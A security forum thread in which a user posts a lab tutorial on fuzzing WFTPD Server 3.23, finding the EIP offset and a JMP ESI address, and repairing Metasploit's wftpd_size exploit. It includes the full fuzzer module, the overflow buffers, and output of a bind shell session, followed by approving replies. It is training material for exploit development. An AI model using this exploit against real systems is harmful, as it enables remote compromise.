Results 1 to 6 of 6

Thread: Metasploit Unleashed Course, adding another application to the mix

  1. #1
    Member
    Join Date
    Jan 2010
    Location
    The new forums
    Posts
    462

    Default Metasploit Unleashed Course, adding another application to the mix

    I did the Metasploit Unleashed course over the holiday weekend and I want to say WOW! Amazing work, enjoyed it so much!

    I wanted to add another application to fuzz and exploit for my own lab, and then I ended up getting carried away and wrote a small guide/module for the course. It plays off the existing modules. There's nothing really 'spectacular' about the guide especially in comparison to the course, but it brings up a good point that happened to me when I installed the FTP server and tried to exploit it.

    __________________________________________
    Simple FTP Fuzzer

    Remember the carpenter's mantra: measure twice, cut once? Well, the same can be applied for creating exploits. We'll take for example our target running running WFTPD Server 3.23 on our XP machine.

    First, will go ahead and download the software: https://www.securinfos.info/old-soft...vulnerable.php

    If you installed the FTP server in Windows components, please uninstall it before installing the software. Go to the Control Panel and open 'Add or Remove Programs'. Select 'Add/Remove Windows Components' on the left-hand side. Double click on 'Internet Information Services (IIS)' and un-check 'File Transfer Protocol FTP Service'

    Install the software, add a FTP user and password with full rights and enable logging.

    After running our enumeration scans we see this exploit is already written in Metasploit and decide to go ahead and try it. Set the options and payload and run the exploit. Also make sure to specify the target as it defaults to Windows 2000 Pro SP4.



    And the results are....."Exploit completed, but no session was created."



    Well...we got a crash, but no bind shell. In fact if we we're doing a pentest and that was our only way into the network, we just blew it! The application would have to be reset for us to get another shot! This is where 'measure twice, cut once', comes into play. A good rule of thumb is to always test your exploits before firing them off. Create a lab, as we've done, and test it before you try it on the actual target. The great thing about Metasploit is that it allows you to reuse and modify code very easily. We see the exploit that was already built in doesn't work, so we are going to have to fix it!

    If we hook a debugger up we see the crash comes right at the jump code. Normally a simple fix would be just to change the jump code, since the current one does not appear to work. Since we want to be thorough, we are going to test this exploit from scratch, using our previously made IMAP fuzzer. First we'll go ahead and make a few minor changes in the code.

    Code:
    root@BT4VM:/pentest/exploits/framework3/modules/auxiliary/fuzzers# chmod 755 ftpfuzz.rb
    root@BT4VM:/pentest/exploits/framework3/modules/auxiliary/fuzzers# cat ftpfuzz.rb
    ##
    # This file is part of the Metasploit Framework and may be subject to
    # redistribution and commercial restrictions. Please see the Metasploit
    # Framework web site for more information on licensing and terms of use.
    # http://metasploit.com/framework/
    ##
    
    
    require 'msf/core'
    
    
    class Metasploit3 < Msf::Auxiliary
    
        include Msf::Exploit::Remote::Ftp
        include Msf::Auxiliary::Dos
    
        def initialize
            super(
                'Name'           => 'Simple FTP Fuzzer',
                'Description'    => %q{
                                    An example of how to build a simple FTP fuzzer.
                                    Account FTP credentials are required in this fuzzer.
                            },
                'Author'         => [ 'ryujin' ],
                'License'        => MSF_LICENSE,
                'Version'        => '$Revision: 1 $'
            )
        end
    
        def fuzz_str()
            return Rex::Text.rand_text_alphanumeric(rand(1024))
        end
    
        def run()
            srand(0)
            while (true)
                connected = connect_login()
                if not connected
                    print_status("Host is not responding - this is G00D ;)")
                    break
                end
                print_status("Generating fuzzed data...")
                fuzzed = "\x41" * 1500
                print_status("Sending fuzzed data, buffer length = %d" % fuzzed.length)
                req = "SIZE /" + fuzzed +  "\r\n"
                print_status(req)
                res = raw_send_recv(req)
                print_status(res)
                disconnect()
            end
        end
    end
    We see that only a few minor changes are needed. The original exploit uses the "SIZE" command followed by "/" and a long character string. We know this portion of the code works, since we we're able to crash the application. This can be verified by looking at the original code or by inspecting the packets sent over the network with Wireshark

    Code:
    cat /pentest/exploits/framework3/modules/exploits/windows/ftp/wftpd_size.rb
    Lets go ahead and fire back up metasploit and see how this looks.



    Attach your debugger to the application on your Windows machine and then test the fuzzer out.



    Looks like we have control of EIP and the buffer string was written into ESP and ESI. Now to find the exact offset that EIP is overwritten at, so we can control the application.

    Will go ahead and edit out FTP fuzzer and modify our 'fuzzed' string.

    Code:
    fuzzed = Rex::Text.pattern_create(1500)
    We can then create a unique pattern combined with pattern_offset.rb to find the location where EIP is overwritten. Will go ahead and open back up Metasploit, plug in the same options as before, and run it.

    We take the hex location from EIP and convert it to ASCII and run it through patter_offset.rb. We see the location is 525 bytes until EIP. We can then edit our fuzzer to confirm this is correct.



    Code:
    fuzzed = "\x41" * 525 + "\x42" * 4 + "\xCC" * 900
    The result is as expected and we now have control of the program.



    The last thing will want to do before trying our exploit out with a payload, is to get a working jump address into ESI. We want to execute a JMP ESI instruction at our EIP overwrite. We can search for one in our debugger using ctrl + f to find a command. Enter 'JMP ESI' minus the quotes. We see there is no JMP ESI in our application, so we are going to have to look at the running executable modules. Click on the executable "E" button on the top and then double click on the USER32.dll and run the same search again. We find the address 0X77D4E23B is a JMP ESI command. Also while we're here, lets set a break point at that address by pressing f2. That way we can do one last test to make sure we control the flow of execution.

    Change our fuzzer with our jump command.

    Code:
    fuzzed = "\x41" * 525 + "\x3b\xe2\xd4\x77" + "\xCC" * 900
    After our fuzzer is ran for the last time we see we hit our break point.



    We can then single step through the program by pressing f9 and we see the jump is made and we land in out "\xCC" bytes.

    We could take this further and test different payloads, bad characters, etc, but the objective of this guide was to get a working exploit. We know the exploit that came with Metasploit needed to be fixed. Since now we have control of the program we can modify the original exploit with the new jump code and it should work.

    Code:
    nano /pentest/exploits/framework3/modules/exploits/windows/ftp/wftpd_size.rb
    After modifying the exploit, will open back up Metasploit and use the same exploit with the same options as before in the beginning.

    Code:
    msf exploit(wftpd_size) > show options
    
    Module options:
    
       Name     Current Setting  Required  Description
       ----     ---------------  --------  -----------
       FTPPASS  lincoln          no        The password for the specified username
       FTPUSER  lincoln          no        The username to authenticate as
       RHOST    192.168.2.128    yes       The target address
       RPORT    21               yes       The target port
    
    
    Payload options (windows/shell_bind_tcp):
    
       Name      Current Setting  Required  Description
       ----      ---------------  --------  -----------
       EXITFUNC  process          yes       Exit technique: seh, thread, process
       LPORT     4444             yes       The local port
       RHOST     192.168.2.128    no        The target address
    
    
    Exploit target:
    
       Id  Name
       --  ----
       2   Windows XP Pro SP2 English
    
    
    msf exploit(wftpd_size) > exploit[*] Started bind handler
    [*] Connecting to FTP server 192.168.2.128:21...[*] Connected to target FTP server.[*] Authenticating as lincoln with password lincoln...[*] Sending password...[*] Trying target Windows XP Pro SP2 English...[*] Command shell session 1 opened (192.168.2.129:56694 -> 192.168.2.128:4444)
    
    Microsoft Windows XP [Version 5.1.2600]
    (C) Copyright 1985-2001 Microsoft Corp.
    
    C:\Documents and Settings\Administrator\Desktop\wftpd323>ipconfig
    ipconfig
    
    Windows IP Configuration
    
    
    Ethernet adapter Local Area Connection 2:
    
            Connection-specific DNS Suffix  . : localdomain
            IP Address. . . . . . . . . . . . : 192.168.2.128
            Subnet Mask . . . . . . . . . . . : 255.255.255.0
            Default Gateway . . . . . . . . . : 192.168.2.2
    
    C:\Documents and Settings\Administrator\Desktop\wftpd323>

  2. #2
    Very good friend of the forum hhmatt's Avatar
    Join Date
    Jan 2010
    Posts
    660

    Default

    Nice writeup, I'll have to give this a try later. Thanks for sharing!

    Probably doesn't belong in the newbie section though.

  3. #3
    Super Moderator Archangel-Amael's Avatar
    Join Date
    Jan 2010
    Location
    Somewhere
    Posts
    8,012

    Default

    Indeed nice work Lincoln and thanks for sharing.
    The graphics add a nice touch.
    BTW I moved it for you since it doesn't belong in the newbie section.
    To be successful here you should read all of the following.
    ForumRules
    ForumFAQ
    If you are new to Back|Track
    Back|Track Wiki
    Failure to do so will probably get your threads deleted or worse.

  4. #4
    Super Moderator lupin's Avatar
    Join Date
    Jan 2010
    Posts
    2,943

    Default

    Good once Lincoln. In my opinion everyone who uses an exploitation product like Metasploit should know these type of details about how they work.
    Capitalisation is important. It's the difference between "Helping your brother Jack off a horse" and "Helping your brother jack off a horse".

    The Forum Rules, Forum FAQ and the BackTrack Wiki... learn them, love them, live them.

  5. #5
    Senior Member kidFromBigD's Avatar
    Join Date
    Jan 2010
    Location
    Texas
    Posts
    159

    Default Terrific!

    Lincoln - many thanks for this. As others have said, it's a good write-up and the screen caps really add a lot.
    You. Are. Doing. It. Wrong.
    -Gitsnik

  6. #6
    Member
    Join Date
    Feb 2010
    Posts
    75

    Default

    intresting post thank you for taking time to put together,broken down well.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •